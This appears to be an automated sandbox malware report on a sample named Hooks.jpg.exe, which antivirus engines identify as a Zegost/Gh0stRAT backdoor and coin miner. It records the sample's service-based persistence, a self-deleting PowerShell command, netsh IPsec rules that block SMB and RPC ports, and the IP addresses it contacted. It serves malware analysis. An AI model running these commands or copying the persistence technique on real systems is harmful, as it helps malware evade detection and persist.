CreateServiceA July 1, 2024, 11 a.m.	service_start_name: start_type: 2 password: display_name: GraphicsPerfSvcs filepath: C:\Users\test22\AppData\Local\Temp\%SystemRoot%\System32\svchost.exe -k GraphicsPerfSvcsGroup service_name: GraphicsPerfSvcs filepath_r: %SystemRoot%\System32\svchost.exe -k GraphicsPerfSvcsGroup desired_access: 983551 service_handle: 0x01cb33d8 error_control: 1 service_type: 32 service_manager_handle: 0x01cb3428	1	30094296	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\Users\test22\AppData\Local\Temp\Hooks.jpg.exe"

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\Hooks.jpg.exe
file	C:\Users\test22\AppData\Roaming\GraphicsPerfSvcs.dll

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00bace00', u'virtual_address': u'0x00c46000', u'entropy': 7.904992015828074, u'name': u'UPX1', u'virtual_size': u'0x00bad000'}

entropy

7.90499201583

description

A section with a high entropy has been found

entropy

0.999874550473

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 1, 2024, 11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

The executable is compressed using UPX (2 events)

section	UPX0				description	Section name indicates UPX
section	UPX1				description	Section name indicates UPX

Uses Windows utilities for basic Windows functionality (12 events)

cmdline	netsh ipsec static add filteraction name=FilteraAtion1 action=block
cmdline	netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
cmdline	netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
cmdline	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\Users\test22\AppData\Local\Temp\Hooks.jpg.exe"
cmdline	netsh ipsec static add filterlist name=Filter1
cmdline	netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
cmdline	netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
cmdline	netsh ipsec static add policy name=Block
cmdline	netsh ipsec static set policy name=Block assign=y
cmdline	netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
cmdline	netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
cmdline	netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (2 events)

host	43.198.152.240
host	51.161.196.188

Installs itself for autorun at Windows startup (2 events)

service_name	GraphicsPerfSvcs				service_path	C:\Users\test22\AppData\Local\Temp\%SystemRoot%\System32\svchost.exe -k GraphicsPerfSvcsGroup
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\GraphicsPerfSvcs\Parameters\ServiceDll				reg_value	C:\Users\test22\AppData\Roaming\GraphicsPerfSvcs.dll

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (moderate confidence)
Cynet	Malicious (score: 99)
CAT-QuickHeal	Trojan.Generic
Skyhigh	BehavesLike.Win32.Generic.wc
ALYac	Gen:Variant.Zusy.551315
Cylance	Unsafe
VIPRE	Gen:Variant.Zusy.551315
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	CryptoMiner ( 005942761 )
BitDefender	Gen:Variant.Zusy.551315
K7GW	CryptoMiner ( 005942761 )
Cybereason	malicious.3021f8
Arcabit	Trojan.Zusy.D86993
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/CoinMiner.CIB
APEX	Malicious
McAfee	Artemis!422F3763021F
Avast	Win32:Trojan-gen
ClamAV	Win.Virus.Gh0stRAT-6997801-0
Kaspersky	HEUR:Trojan.Win32.Generic
Alibaba	Backdoor:Win32/Zegost.f6cb248b
NANO-Antivirus	Trojan.Win32.CoinMiner.kogggh
MicroWorld-eScan	Gen:Variant.Zusy.551315
Rising	Backdoor.Zegost!8.177 (TFE:5:ZJ9JS4CoS8B)
Emsisoft	Gen:Variant.Zusy.551315 (B)
F-Secure	Heuristic.HEUR/AGEN.1369711
DrWeb	BackDoor.Spy.422
Zillya	Trojan.CoinMiner.Win32.52025
TrendMicro	TROJ_GEN.R03BC0DFA24
McAfeeD	ti!A1871F4F0149
Trapmine	malicious.high.ml.score
FireEye	Gen:Variant.Zusy.551315
Sophos	Mal/Generic-S
Ikarus	Trojan.Win32.CoinMiner
Webroot	W32.Trojan.Gen
Google	Detected
Avira	HEUR/AGEN.1369711
Antiy-AVL	Trojan/Win32.Blamon.a
Kingsoft	Win32.Trojan.Generic.a
Xcitium	Packed.Win32.MUPX.Gen@24tbus
Microsoft	Backdoor:Win32/Zegost.AD
ZoneAlarm	HEUR:Backdoor.Win32.Farfli.gen
GData	Win32.Trojan.Agent.WP
AhnLab-V3	Backdoor/Win.Zegost.C5630478
BitDefenderTheta	Gen:NN.ZexaF.36808.@pKfae9LWmkb
DeepInstinct	MALICIOUS
VBA32	BScope.Trojan.Miancha
Panda	Trj/CI.A

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	1.226.84.135:53
dead_host	192.168.56.102:49186

Hooks.jpg.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All